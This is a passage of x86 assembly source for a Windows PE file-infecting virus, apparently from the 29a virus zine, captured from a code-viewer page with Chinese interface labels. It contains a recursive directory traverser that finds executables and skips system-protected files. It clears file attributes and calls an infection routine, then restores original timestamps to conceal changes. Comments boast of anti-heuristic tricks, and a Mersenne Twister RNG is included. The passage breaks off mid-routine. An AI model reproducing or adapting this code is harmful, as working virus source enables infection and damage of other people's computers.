📄 29a-7.003
字号:
ip_freent label near
call dword ptr [esp + 3ch + ipntcrcstk.ipntNetApiBufferFree + 4]
jmp ip_restore
find_ip endp
;-----------------------------------------------------------------------------
;Mersenne Twister RNG MT19937 (c) 1997 Makoto Matsumoto and Takuji Nishimura
;period is ((2^19937)-1) with 623-dimensionally equidistributed sequence
;asm port and size optimise by rgb in 2002
;-----------------------------------------------------------------------------
randinit proc near ;eax = seed, ecx = 0, edi -> unaligned RNG cache
pushad
or edi, 3
inc edi ;dword align
push edi
or eax, 1
mov cx, statelen
init_loop label near
stos dword ptr [edi]
mov edx, 69069
mul edx ;Knuth: x_new = x_old * 69069
loop init_loop
inc ecx ;force reload
call initdelta
initdelta label near
pop edi
add edi, offset randvars - offset initdelta
xchg ecx, eax
stos dword ptr [edi]
pop eax
stos dword ptr [edi]
stos dword ptr [edi]
popad
ret
randinit endp
random proc near
pushad
call randelta
randvars label near
db 'rgb!' ;numbers left
db 'rgb!' ;next pointer
db 'rgb!' ;state pointer
randelta label near
pop esi
push esi
lods dword ptr [esi]
xchg ecx, eax
lods dword ptr [esi]
xchg esi, eax
loop random_ret
mov cx, statelen - period
mov esi, dword ptr [eax]
lea ebx, dword ptr [esi + (period * 4)]
mov edi, esi
push esi
lods dword ptr [esi]
xchg edx, eax
call twist
pop ebx
mov cx, period - 1
push ecx
push ebx
call twist
pop esi
push esi
inc ecx
call twist
xchg edx, eax
pop esi
pop ecx
inc ecx
random_ret label near
lods dword ptr [esi]
mov edx, eax
shr eax, tshiftU
xor eax, edx
mov edx, eax
shl eax, tshiftS
and eax, tmaskB
xor eax, edx
mov edx, eax
shl eax, tshiftT
and eax, tmaskC
xor eax, edx
mov edx, eax
shr eax, tshiftL
xor eax, edx
pop edi
mov dword ptr [esp + 1ch], eax ;eax in pushad
xchg ecx, eax
stos dword ptr [edi]
xchg esi, eax
stos dword ptr [edi]
popad
ret
random endp
twist proc near
lods dword ptr [esi]
push eax
add eax, eax ;remove highest bit
add edx, edx ;test highest bit
rcr eax, 2 ;merge bits and test lowest bit
jnb twist_skip ;remove branch but larger using:
xor eax, matrixA ;sbb edx, edx+and edx, matrixA+xor eax, edx
twist_skip label near
xor eax, dword ptr [ebx]
add ebx, 4
stos dword ptr [edi]
pop edx
loop twist
ret
twist endp
;-----------------------------------------------------------------------------
;non-recursive directory traverser
;-----------------------------------------------------------------------------
find_files proc near
pushad
push size findlist
push GMEM_ZEROINIT
call cGlobalAlloc
test eax, eax
je file_exit
xchg esi, eax
call get_krnapis
file_first label near
push '*' ;ANSI-compatible Unicode findmask
mov eax, esp
lea ebx, dword ptr [esi + findlist.finddata]
push ebx
push eax
call dword ptr [ebp + krncrcstk.kFindFirstFileW]
pop ecx
mov dword ptr [esi + findlist.findhand], eax
inc eax
je file_prev
;you must always step forward from where you stand
test_dirfile label near
mov eax, dword ptr [ebx + WIN32_FIND_DATA.dwFileAttributes]
lea edi, dword ptr [esi + findlist.finddata.cFileName]
test al, FILE_ATTRIBUTE_DIRECTORY
je test_file
cmp byte ptr [edi], '.' ;ignore . and .. (but also .* directories under NT/2000/XP)
je file_next
;-----------------------------------------------------------------------------
;enter subdirectory, and allocate another list node
;-----------------------------------------------------------------------------
push edi
call dword ptr [ebp + krncrcstk.kSetCurrentDirectoryW]
xchg ecx, eax
jecxz file_next
push size findlist
push GMEM_FIXED
call cGlobalAlloc
xchg ecx, eax
jecxz step_updir
xchg esi, ecx
mov dword ptr [esi + findlist.findprev], ecx
jmp file_first
file_exit label near
popad
ret
file_next label near
lea ebx, dword ptr [esi + findlist.finddata]
push ebx
mov edi, dword ptr [esi + findlist.findhand]
push edi
call dword ptr [ebp + krncrcstk.kFindNextFileW]
test eax, eax
jne test_dirfile
;-----------------------------------------------------------------------------
;close find, and free list node
;-----------------------------------------------------------------------------
push edi
mov al, (krncrcstk.kFindClose - krncrcstk.klstrlenW) shr 2
call store_krnapi
file_prev label near
push esi
mov esi, dword ptr [esi + findlist.findprev]
call cGlobalFree
test esi, esi
je file_exit
step_updir label near
;-----------------------------------------------------------------------------
;the ANSI string ".." can be used, even on Unicode platforms
;-----------------------------------------------------------------------------
push '..'
push esp
call cSetCurrentDirectoryA
pop eax
jmp file_next
test_file label near
;-----------------------------------------------------------------------------
;get full path and convert to Unicode if required (SFC requires Unicode path)
;-----------------------------------------------------------------------------
push eax ;save original file attributes for close
mov eax, ebp
enter MAX_PATH * 2, 0
mov ecx, esp
push eax
push esp
push ecx
push MAX_PATH
push edi
call dword ptr [eax + krncrcstk.kGetFullPathNameW]
xchg edi, eax
pop eax
xor ebx, ebx
call cGetVersion
test eax, eax
jns store_sfcapi
mov ecx, esp
xchg ebp, eax
enter MAX_PATH * 2, 0
xchg ebp, eax
mov eax, esp
push MAX_PATH
push eax
inc edi
push edi
push ecx
push ebx ;use default translation
push ebx ;CP_ANSI
push (krncrcstk.kMultiByteToWideChar - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
store_sfcapi label near
;-----------------------------------------------------------------------------
;don't touch protected files
;-----------------------------------------------------------------------------
mov ecx, '!bgr' ;SfcIsFileProtected
xor eax, eax ;fake success in case of no SFC
jecxz leave_sfc
push esp
push ebx
call ecx
leave_sfc label near
leave
test eax, eax
jne restore_attr
call set_fileattr
push ebx
push ebx ;attribute ignored for existing files
push OPEN_EXISTING
push ebx
push ebx
push GENERIC_READ or GENERIC_WRITE
push edi
call dword ptr [ebp + krncrcstk.kCreateFileW]
xchg ebx, eax
call test_infect
db 81h ;mask CALL
call infect_file ;Super Nashwan power ;)
lea eax, dword ptr [esi + findlist.finddata.ftLastWriteTime]
push eax
sub eax, 8
push eax
sub eax, 8
push eax
push ebx
push (krncrcstk.kSetFileTime - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
push ebx
call cCloseHandle
restore_attr label near
pop ebx ;restore original file attributes
call set_fileattr
jmp file_next
find_files endp
;-----------------------------------------------------------------------------
;look for MZ and PE file signatures
;-----------------------------------------------------------------------------
is_pehdr proc near ;edi -> map view
cmp word ptr [edi], 'ZM' ;Windows does not check 'MZ'
jne pehdr_ret
mov esi, dword ptr [edi + mzhdr.mzlfanew]
add esi, edi
lods dword ptr [esi] ;SEH protects against bad lfanew value
add eax, -'EP' ;anti-heuristic test filetype ;) and clear EAX
pehdr_ret label near
ret ;if PE file, then eax = 0, esi -> COFF header, Z flag set
is_pehdr endp
;-----------------------------------------------------------------------------
;reset/set read-only file attribute
;-----------------------------------------------------------------------------
set_fileattr proc near ;ebx = file attributes, esi -> findlist, ebp -> platform APIs
push ebx
lea edi, dword ptr [esi + findlist.finddata.cFileName]
push edi
call dword ptr [ebp + krncrcstk.kSetFileAttributesW]
ret ;edi -> filename
db "12/12/02"
set_fileattr endp
;-----------------------------------------------------------------------------
;test if file is infectable (not protected, PE, x86, non-system, not infected, etc)
;-----------------------------------------------------------------------------
test_infect proc near ;esi = find data, edi = map view, ebp -> platform APIs
call map_view
mov ebp, esi
call is_pehdr
jne inftest_ret
lods dword ptr [esi]
cmp ax, IMAGE_FILE_MACHINE_I386
jne inftest_ret ;onl⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -